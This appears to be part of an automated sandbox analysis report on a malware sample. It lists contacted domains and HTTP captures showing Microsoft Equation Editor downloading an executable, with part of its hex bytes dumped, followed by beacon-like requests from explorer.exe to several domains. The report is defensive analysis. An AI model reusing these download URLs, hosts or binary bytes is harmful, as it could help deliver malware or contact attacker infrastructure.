                                                                                                                                                              • www.discjockeydelraybeach.com
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              • www.girlboyfriends.com
                                                                                                                                                              • www.burundiacademyst.com
                                                                                                                                                              • www.pipienta.com

                                                                                                                                                              HTTP Packets

                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              0192.168.2.2249167192.3.122.17780C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 16:58:50.469680071 CEST0OUTGET /a/so.exe HTTP/1.1
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                              Host: will.kasraz.com
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              May 4, 2021 16:58:50.608273983 CEST2INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 04 May 2021 14:58:50 GMT
                                                                                                                                                              Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3
                                                                                                                                                              Last-Modified: Tue, 04 May 2021 10:00:54 GMT
                                                                                                                                                              ETag: "a2800-5c17e27600d6b"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Content-Length: 665600
                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-msdownload
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 1b 91 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 1e 0a 00 00 08 00 00 00 00 00 00 26 3d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 3c 0a 00 4f 00 00 00 00 40 0a 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 1d 0a 00 00 20 00 00 00 1e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 04 00 00 00 40 0a 00 00 06 00 00 00 20 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 3d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 6e 01 00 b8 6d 01 00 03 00 00 00 01 00 00 06 e4 db 02 00 f0 60 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1d 00 00 0a 28 1e 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 1f 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 20 00 00 0a 00 02 17 28 21 00 00 0a 00 02 17 28 22 00 00 0a 00 02 17 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 93 03 00 06 28 25 00 00 0a 00 2a 26 00 02 28 26 00 00 0a 00 2a ce 73 27 00 00 0a 80 01 00 00 04 73 28 00 00 0a 80 02 00 00 04 73 29 00 00 0a 80 03 00 00 04 73 2a 00 00 0a 80 04 00 00 04 73 2b 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 26 00 02 28 31 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 32 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 33 00 00 0a 6f 34 00 00 0a 73 35 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELV`P&= @@ @<O@` H.text, `.rsrc@ @@.reloc`&@B=H,nm`0(((o*( (!("(#($*N(o(%*&(&*s's(s)s*s+*0~o,+*0~o-+*0~o.+*0~o/+*0~o0+*&(1*0<~(2,!rp(3o4s5~+*0
                                                                                                                                                              May 4, 2021 16:58:50.608302116 CEST3INData Raw: 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 27 00 00 70 7e 07 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 0b 07 74 26 00 00 01 0a 2b 00 06 2a 00 00 13 30 03
                                                                                                                                                              Data Ascii: ~+*"*0&(r'p~o6(7t&+*0&(r[p~o6(7t&+*0&(rp~o6(7t&+*0&(rp~o6(7t&+*0&
                                                                                                                                                              May 4, 2021 16:58:50.608313084 CEST4INData Raw: 00 00 0a 0b 07 25 2d 0c 26 12 02 fe 15 28 00 00 01 08 2b 05 a5 28 00 00 01 0a 2b 00 06 2a 00 00 00 13 30 03 00 26 00 00 00 09 00 00 11 00 28 0c 00 00 06 72 6b 05 00 70 7e 07 00 00 04 6f 36 00 00 0a 28 37 00 00 0a 0b 07 74 27 00 00 01 0a 2b 00 06
                                                                                                                                                              Data Ascii: %-&(+(+*0&(rkp~o6(7t'+*05(rp~o6(7%-&(+(+*0&(rp~o6(7t&+*0<~(2,!rp
                                                                                                                                                              May 4, 2021 16:58:50.608345032 CEST6INData Raw: 00 06 00 02 73 4e 00 00 0a 6f 69 00 00 06 00 02 73 51 00 00 0a 6f 6b 00 00 06 00 02 73 4c 00 00 0a 6f 6d 00 00 06 00 02 02 7b 0d 00 00 04 73 54 00 00 0a 6f 6f 00 00 06 00 02 6f 4e 00 00 06 6f 55 00 00 0a 00 02 28 56 00 00 0a 00 02 6f 3c 00 00 06
                                                                                                                                                              Data Ascii: sNoisQoksLom{sToooNoU(Vo<oWo<oXo<sYoZo<rpo[o<o\o<o]o< s^o_o<Ho`o<oao> (sYoZ
                                                                                                                                                              May 4, 2021 16:58:50.743635893 CEST7INData Raw: 00 02 6f 50 00 00 06 72 9b 08 00 70 6f 5b 00 00 0a 00 02 6f 50 00 00 06 1f 17 1f 17 73 5e 00 00 0a 6f 5f 00 00 0a 00 02 6f 50 00 00 06 1f 3f 6f 60 00 00 0a 00 02 6f 50 00 00 06 16 6f 63 00 00 0a 00 02 6f 52 00 00 06 17 6f 67 00 00 0a 00 02 6f 52
                                                                                                                                                              Data Ascii: oPrpo[oPs^o_oP?o`oPocoRogoRk sYoZoRrpo[oR=s^o_oR>o`oRrpokoT(soroTN sYoZoTrpo[oTs^
                                                                                                                                                              May 4, 2021 16:58:50.743664980 CEST9INData Raw: 06 20 bb 01 00 00 20 54 01 00 00 73 59 00 00 0a 6f 5a 00 00 0a 00 02 6f 6c 00 00 06 18 73 7b 00 00 0a 6f 7c 00 00 0a 00 02 6f 6c 00 00 06 72 4f 0a 00 70 6f 5b 00 00 0a 00 02 6f 6c 00 00 06 1f 19 1f 14 73 5e 00 00 0a 6f 5f 00 00 0a 00 02 6f 6c 00
                                                                                                                                                              Data Ascii: TsYoZols{o|olrOpo[ols^o_olKo`olrKpoboloc"@"PAs}(~((olo(ojo(oho(o<o(o>o
                                                                                                                                                              May 4, 2021 16:58:50.743678093 CEST10INData Raw: 1a 00 00 04 0b 07 2c 07 07 06 6f 87 00 00 0a 2a 26 02 7b 1b 00 00 04 2b 00 2a 22 02 03 7d 1b 00 00 04 2a 26 02 7b 1c 00 00 04 2b 00 2a 13 30 02 00 37 00 00 00 13 00 00 11 02 fe 06 79 00 00 06 73 85 00 00 0a 0a 02 7b 1c 00 00 04 0b 07 2c 07 07 06
                                                                                                                                                              Data Ascii: ,o*&{+*"}*&{+*07ys{,o}{,o*&{+*07s{,o}{,o*&{+*07xs{,o
                                                                                                                                                              May 4, 2021 16:58:50.743690968 CEST11INData Raw: 6f 9f 00 00 0a 00 00 2b 0f 00 02 6f 6a 00 00 06 16 6f 9f 00 00 0a 00 00 02 6f 3c 00 00 06 02 6f 42 00 00 06 6f a3 00 00 0a 28 80 01 00 06 00 2a 00 00 00 13 30 02 00 37 00 00 00 0b 00 00 11 00 28 7e 01 00 06 6f a4 00 00 0a 0a 06 2c 14 02 6f 5c 00
                                                                                                                                                              Data Ascii: o+ojoo<oBo(*07(~o,o\rpob+o\r_pob*0(oboo(lo(l[}(o<o<ol{(Z(oo<odlo
                                                                                                                                                              May 4, 2021 16:58:50.743702888 CEST13INData Raw: 2a 13 30 02 00 2b 00 00 00 1f 00 00 11 00 72 c4 0d 00 70 0a 02 28 81 00 00 06 00 28 7e 01 00 06 6f a4 00 00 0a 0b 07 2c 0d 28 7e 01 00 06 06 6f 0b 03 00 06 00 00 00 2a 00 13 30 02 00 2a 00 00 00 0b 00 00 11 00 02 28 75 00 00 06 00 28 7e 01 00 06
                                                                                                                                                              Data Ascii: *0+rp((~o,(~o*0*(u(~o,(~{+o*0oBo}+rp%{+((}+oFo,{+rp{/o}++{+rp{,
                                                                                                                                                              May 4, 2021 16:58:50.743719101 CEST14INData Raw: 6f 50 00 00 06 11 0f 6f 72 00 00 0a 00 02 11 0a 17 9a 6f cc 00 00 0a 7d 2d 00 00 04 00 00 00 11 08 17 d6 13 08 11 08 11 07 8e 69 fe 04 13 10 11 10 3a 14 ff ff ff de 10 25 28 ad 00 00 0a 13 11 00 28 b0 00 00 0a de 00 00 02 28 75 00 00 06 00 00 00
                                                                                                                                                              Data Ascii: oPoro}-i:%(((u*AC09o<o,$o<{)((ono*6((*01,{h+,{hoG
                                                                                                                                                              May 4, 2021 16:58:50.743731022 CEST15INData Raw: 49 00 00 0a 7d 68 00 00 04 d0 0d 00 00 02 28 33 00 00 0a 73 4a 00 00 0a 0a 02 73 d4 00 00 0a 6f f0 00 00 06 00 02 73 d5 00 00 0a 6f f2 00 00 06 00 02 02 7b 68 00 00 04 73 d6 00 00 0a 6f 8e 00 00 06 00 02 73 d7 00 00 0a 6f 94 00 00 06 00 02 73 d8
                                                                                                                                                              Data Ascii: I}h(3sJsoso{hsosososososososososososososososo


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              1192.168.2.2249169198.54.117.21080C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 16:59:58.265768051 CEST702OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1
                                                                                                                                                              Host: www.donelys.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              2192.168.2.2249170108.177.174.18280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:04.009607077 CEST703OUTGET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.discjockeydelraybeach.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:04.202766895 CEST703INHTTP/1.1 200 OK
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Server: Nginx Microsoft-HTTPAPI/2.0
                                                                                                                                                              X-Powered-By: Nginx
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:01 GMT
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 33 0d 0a ef bb bf 0d 0a
                                                                                                                                                              Data Ascii: 3
                                                                                                                                                              May 4, 2021 17:00:04.202800989 CEST705INData Raw: 31 30 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e6 a3 80 e6 b5 8b 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c
                                                                                                                                                              Data Ascii: 1072<!DOCTYPE html><html><head> <title>...</title> <meta charset=UTF-8 /> <meta http-equiv=Cache-Control content=no-siteapp /> <meta http-equiv=Cache-Control content=no-transform /> <meta name=applicab
                                                                                                                                                              May 4, 2021 17:00:04.202812910 CEST706INData Raw: 61 63 69 6e 67 3a 32 70 78 7d 2e 61 6c 65 72 74 2d 62 74 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 35 36 35 36 7d 2e 61 6c 65 72 74 2d 66 6f 6f 74 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 68 65
                                                                                                                                                              Data Ascii: acing:2px}.alert-btn:hover{background-color:#ff5656}.alert-footer{margin:0 auto;height:42px;text-align:center;width:100%;margin-bottom:10px}.alert-footer-icon{float:left}.alert-footer-text{float:left;border-left:2px solid #eee;padding:3px 0 0
                                                                                                                                                              May 4, 2021 17:00:04.202828884 CEST708INData Raw: 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72
                                                                                                                                                              Data Ascii: var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script> var _hmt = _hmt || []; (function () { var hm = document.createElement("scrip
                                                                                                                                                              May 4, 2021 17:00:04.202841043 CEST708INData Raw: 61 64 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 73 74 72 31 3b 0a 20 20 20 20 20 20 20 20 62 74 6e 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 62 74 6e 54 65 78 74 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e
                                                                                                                                                              Data Ascii: ad").innerHTML = str1; btn.innerHTML = btnText; </script> <script> var _0x1064=['/panel','ype','indexO','//chen','split','parent','88.com','src','251XxkTNr','jia.ch','2416tOolcC'


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              3192.168.2.2249171103.5.116.13280C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:09.929189920 CEST708OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1
                                                                                                                                                              Host: www.arfjkacsgatfzbazpdth.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:10.211775064 CEST709INHTTP/1.1 302 Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:10 GMT
                                                                                                                                                              Server: Apache
                                                                                                                                                              Location: http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==
                                                                                                                                                              Content-Length: 333
                                                                                                                                                              Connection: close
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 68 6f 63 6f 2e 6d 68 6e 65 62 73 61 64 65 62 75 67 70 63 74 6b 75 72 79 74 2e 63 6f 6d 2f 38 75 33 62 2f 3f 41 46 4e 48 57 3d 37 6e 35 74 5f 4a 64 70 53 76 57 4c 79 32 30 26 61 6d 70 3b 68 52 2d 70 69 30 3d 50 57 4e 42 44 48 32 6b 50 46 62 78 75 38 77 4d 71 38 42 2b 35 34 57 61 79 4e 66 63 59 6a 35 30 51 56 45 78 79 42 6e 77 4a 77 4a 44 34 4d 58 73 4a 69 4c 44 52 74 5a 32 61 5a 4a 47 38 6b 63 53 44 2f 53 51 32 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://choco.mhnebsadebugpctkuryt.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&amp;hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A==">here</a>.</p></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              4192.168.2.224917254.156.162.12180C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:15.537406921 CEST710OUTGET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.girlboyfriends.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:15.678083897 CEST712INHTTP/1.1 200 OK
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:15 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 31 34 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 64 38 64 38 64 38 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 70 61 67 65 42 72 6f 77 73 65 72 45 72 72 6f 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 32 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 73 68 61 64 6f 77 5f 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 5f 62 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 2e 68 65 61 64 65 72 53 68 6f 72 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 69 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 34 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73 74 61 74 69 63 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 5f 62 67 2e 70 6e 67 29 20 74 6f 70 20 72 65 70 65 61 74 2d 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 68 65 61 64 65 72 20 2e 68 65 61 64 65 72 5f 74 6f 70 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 36 35 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 0d 0a 20 20 20
                                                                                                                                                              Data Ascii: 14c8<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body { background: #d8d8d8 url(https://www.namebrightstatic.com/images/bg.png) top repeat-x; } .pageBrowserError { min-height: 600px; } .container { margin: 0 auto; width: 922px; } .shadow_l { margin-left: 10px; } .main_bg { background: #fff; } #header { padding: 0 2px; background: #fff; } #header.headerShort { height: 65px; } #header .header_in { padding-right: 14px; height: 145px; overflow: hidden; background: url(https://www.namebrightstatic.com/images/header_bg.png) top repeat-x; } #header .header_top { height: 65px; overflow: hidden
                                                                                                                                                              May 4, 2021 17:00:15.678112984 CEST713INData Raw: 20 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 23 6c 6f 67 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 6d 65 62 72 69 67 68 74 73
                                                                                                                                                              Data Ascii: } #logo { background: url(https://www.namebrightstatic.com/images/logo_off.gif) no-repeat; width: 225px; height: 57px; margin-left: 29px; float: left;
                                                                                                                                                              May 4, 2021 17:00:15.678128004 CEST714INData Raw: 61 6c 20 31 36 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20
                                                                                                                                                              Data Ascii: al 16px Arial, Helvetica, sans-serif !important; color: #fff; } .siteMaintenance p a { color: #FFF; } </style></head><body> <div class="sk
                                                                                                                                                              May 4, 2021 17:00:15.678139925 CEST716INData Raw: 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 4d 61 69 6e 74 65 6e 61 6e 63 65 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d
                                                                                                                                                              Data Ascii: d"> <div class="siteMaintenance" style="font-family:Tahoma"> <h1>girlboyfriends.com<br /> is coming soon</h1> </div>
                                                                                                                                                              May 4, 2021 17:00:15.678153992 CEST716INData Raw: 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 45 6e 64 20 6f 66 20 53 74 61 74 43 6f 75 6e 74 65 72 20 43 6f 64 65 20 66 6f 72 20 44 65
                                                                                                                                                              Data Ascii: nter"> </a> </div></noscript>... End of StatCounter Code for Default Guide --></body></html>
